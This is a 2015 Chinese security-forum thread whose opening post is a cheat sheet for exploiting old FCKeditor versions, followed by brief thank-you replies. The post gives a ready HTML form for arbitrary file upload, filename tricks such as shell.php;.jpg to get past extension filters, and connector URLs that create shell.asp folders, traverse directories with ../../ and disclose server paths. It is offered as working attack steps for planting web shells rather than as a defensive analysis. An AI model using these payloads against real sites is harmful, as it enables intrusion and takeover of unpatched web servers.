搜索
红客联盟 - 由08安全团队运营»社区首页 技术攻防 漏洞情报 Fckeditor 漏洞利用
楼主: 冷约

Fckeditor 漏洞利用

[复制链接]
冷约
  • TA的每日心情
    开心
    2015-9-4 12:23

    • 签到天数: 12 天

    [LV.3]偶尔看看II
    发表于 2015-8-21 15:23:11 来自手机 | 显示全部楼层 |阅读模式
    Fckeditor漏洞利用
    查看编辑器版本
    FCKeditor/_whatsnew.html
    fckeditor/editor/dialog/fck_about.html
    —————————————————————————————————————————————————————————————
    2. Version 2.2 版本
    Apache+linux 环境下在上传文件后面加个.突破!测试通过。
    —————————————————————————————————————————————————————————————
    3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
    <form id="frmUpload" enctype="multipart/form-data"
    action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
    <input type="file" name="NewFile" size="50"><br>
    <input id="btnUpload" type="submit" value="Upload">
    </form>
    —————————————————————————————————————————————————————————————
    4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
    很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
    4.1:提交shell.php+空格绕过
    不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
    —————————————————————————————————————————————————————————————
    5. 突破建立文件夹
    FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=%2Fshell.asp&amp;NewFolderName=z&amp;uuid=1244789975684
    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&amp;CurrentFolder=/&amp;Type=Image&amp;NewFolderName=shell.asp
    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&amp;Type=Image&amp;CurrentFolder=../../
    —————————————————————————————————————————————————————————————
    6. FCKeditor 中test 文件的上传地址
    FCKeditor/editor/filemanager/browser/default/connectors/test.html
    FCKeditor/editor/filemanager/upload/test.html
    FCKeditor/editor/filemanager/connectors/test.html
    FCKeditor/editor/filemanager/connectors/uploadtest.html
    —————————————————————————————————————————————————————————————
    7.常用上传地址
    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&amp;Type=Image&amp;CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&amp;connector=connectors/asp/connector.asp
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
    JSP 版:
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;Connector=connectors/jsp/connector.jsp
    注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
    件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
    —————————————————————————————————————————————————————————————
    8.其他上传地址
    FCKeditor/_samples/default.html
    FCKeditor/_samples/asp/sample01.asp
    FCKeditor/_samples/asp/sample02.asp
    FCKeditor/_samples/asp/sample03.asp
    FCKeditor/_samples/asp/sample04.asp
    一般很多站点都已删除_samples 目录,可以试试。
    FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
    —————————————————————————————————————————————————————————————
    9.列目录漏洞也可助找上传地址
    Version 2.4.1 测试通过
    修改CurrentFolder 参数使用 ../../来进入不同的目录
    /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=../../..%2F&amp;NewFolderName=shell.asp
    根据返回的XML 信息可以查看网站所有的目录。
    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&amp;Type=Image&amp;CurrentFolder=%2F
    也可以直接浏览盘符:
    JSP 版本:
    FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&amp;Type=&amp;CurrentFolder=%2F
    —————————————————————————————————————————————————————————————
    10.爆路径漏洞
    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&amp;Type=File&amp;CurrentFolder=/shell.asp
    FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀)
    /FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&amp;connector=connectors/aspx/connector.aspx 2.5可突破
    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&amp;Type=File&amp;CurrentFolder=/shell.asp
    —————————————————————————————————————————————————————————————
    11
    回复

    使用道具 举报

    Linda
  • TA的每日心情
    擦汗
    2023-11-2 19:55

    • 签到天数: 94 天

    [LV.6]常住居民II
    发表于 2015-8-21 16:10:38 | 显示全部楼层
    感觉像CTRL+v的
    回复 支持 反对

    使用道具 举报

    CHRIS

    该用户从未签到
    发表于 2015-8-21 22:16:13 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    ruguoruo

    该用户从未签到
    发表于 2015-8-22 00:26:01 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    若冰

    该用户从未签到
    发表于 2015-8-22 00:58:22 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    borall

    该用户从未签到
    发表于 2015-8-23 08:56:43 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    borall

    该用户从未签到
    发表于 2015-8-24 04:10:21 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    cl476874045
  • TA的每日心情
    慵懒
    2019-4-14 17:44

    • 签到天数: 5 天

    [LV.2]偶尔看看I
    发表于 2015-8-24 08:50:34 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    H.U.C-麦麦

    该用户从未签到
    发表于 2015-8-25 10:51:24 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    arctic

    该用户从未签到
    发表于 2015-8-26 03:52:24 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    返回列表 发帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 14:02 , Processed in 0.020013 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部